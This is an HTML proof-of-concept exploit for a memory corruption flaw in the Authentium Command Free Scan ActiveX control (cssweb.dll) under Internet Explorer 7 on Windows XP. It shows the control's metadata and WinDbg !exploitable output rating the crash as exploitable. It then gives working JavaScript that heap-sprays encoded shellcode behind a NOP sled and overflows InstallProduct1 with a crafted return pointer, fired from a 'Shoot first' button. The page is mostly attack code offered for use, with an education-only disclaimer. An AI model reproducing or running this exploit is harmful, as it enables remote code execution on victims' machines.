<html>
<body>
<pre>
<img src="http://sotiriu.de/images/logo_wh_80.png"><br>
<h2>Authentium Command Free Scan ActiveX Control Memory corruption Exploit</h2>
Author:   Nikolas Sotiriu (lofi)
Advisory: http://www.sotiriu.de/adv/NSOADV-2010-xxx.txt

Use it only for education or ethical pentesting! The author accepts no
liability for damage caused by this tool.

<input language=JavaScript onclick=shoot() type=button value="Rule#5 Shoot first"><br>

<h3>ActiveX Control Informations:</h3>
Name:   CSS Web Installer Class
Prog ID:  CSSWEBLib.Installer
Vendor:   Authentium, Inc.
Type:              ActiveX-Control
Version:           1.4.9508.605
GUID:              {6CCE3920-3183-4B3D-808A-B12EB769DE12}
File:              cssweb.dll
Folder:   C:\WINDOWS\Downloaded Program Files\
Safe for Script:  True
Safe for Init:   True
IObjectSafety:   False

<h3>Test Informations:</h3>
- Windows XP SP3 IE7 Ger

<h3>M$ Exploitablitiy Informations</h3>

(158.968): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=7efefefe ebx=02695140 ecx=02695180 edx=41414141 esi=02695140 edi=42424242
eip=1000c1a9 esp=0194b414 ebp=0194b4e0 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\Downloaded Program Files\cssweb.dll -
cssweb!DllUnregisterServer+0x37a3:
1000c1a9 8917            mov     dword ptr [edi],edx  ds:0023:42424242=????????
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
0:005> !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0x42424242
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Write Access Violation

Exception Hash (Major/Minor): 0x223e0447.0x22676030

Stack Trace:
cssweb!DllUnregisterServer+0x37a3
cssweb!DllUnregisterServer+0x22d8
mshtml!CFontCache::GetBaseCcs+0x1bd
mshtml!CStr::Set+0x1b
mshtml!COneRun::Clone+0x87
Instruction Address: 0x000000001000c1a9

Description: User Mode Write AV
Short Description: WriteAV
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at cssweb!DllUnregisterServer+0x00000000000037a3 (Hash=0x223e0447.0x22676030)

User mode write access violations that are not near NULL are exploitable.

</pre>
<object classid='clsid:6CCE3920-3183-4B3D-808A-B12EB769DE12' id='obj'></object>

<script language='javascript'>

 shellcode = unescape(
   '%ub0ba%u8813%udbda%ud9d5%u2474%u5ef4%uc933%u33b1'+
   '%u5631%u8312%ufcee%ue603%u6a1d%ufa2f%ue3ca%u02d0'+
   '%u940b%ue759%u863a%u6c3e%u166e%u2034%udd83%ud018'+
   '%u9310%ud7b4%u1e91%ud6e3%uaf22%ub42b%ub1e1%uc6d7'+
   '%u1235%u09e9%u5348%u772e%u01a3%ufce7%ub616%u408c'+
   '%ub7ab%ucf42%ucf93%u0fe7%u7a67%u5fe9%uf1d8%u47a1'+
   '%u5d52%u7612%ubdb7%u316e%u76bc%uc004%u4714%uf3e5'+
   '%u0458%u3cd8%u5455%ufa1c%u2386%uf956%u343b%u80ad'+
   '%ub1e7%u2230%u6163%ud391%uf4a0%udf52%u720d%uc33c'+
   '%u5790%uff36%u5619%u7699%u7d59%ud33d%u1c39%ub964'+
   '%u21ec%u6576%u8450%u87fc%ube85%ucd5e%u3258%ua8e5'+
   '%u4c5b%u9ae6%u7d33%u756d%u8243%u32a4%u73b5%uae75'+
   '%u2a22%u93ec%ucd2e%ud7da%u4e56%ua7ef%u4eac%ua29a'+
   '%uc8e9%ude76%ubd62%u4d78%u9482%u101a%u7410%ub7f3'+
   '%u1f90%u410b');

 nops=unescape('%u9090%u9090');
 headersize =20;
 
 slackspace= headersize + shellcode.length;
     
     //Filling the header
 while(nops.length< slackspace) nops+= nops;
  fillblock= nops.substring(0, slackspace);
  block= nops.substring(0, nops.length- slackspace);
     
 while( block.length+ slackspace<0x30000) block= block+ block+ fillblock;
    
 //Creating the array.
 memory=new Array();
     
 //Filling the array with the nops + shellcode.
 for( counter=0; counter<300; counter++) memory[counter]= block + shellcode;

 //This is our RET
 edx=unescape('%08%08%08%08');

 ret='';
 //Junk
 for( counter=0; counter<=2075; counter++) ret+=unescape('%42');

 //Build the pointer to our overwritten RET
 //I know this looks strange but it was the only way i found to overcome
        //the badchar problem (0x8E=>bad 0x94=>bad)
 ret+=unescape('%18');
 ret+="?; //%8E must be given in as unicode sign (beware of you editor)
 ret+="?; //%95 must be given in as unicode sign (beware of you editor)
 ret+=unescape('%01');
 //Pointer is => 0x01948e18 from cssweb.dll

function shoot()
 {
 obj.InstallProduct1(edx,ret)

 }

</script>
</body>
</html>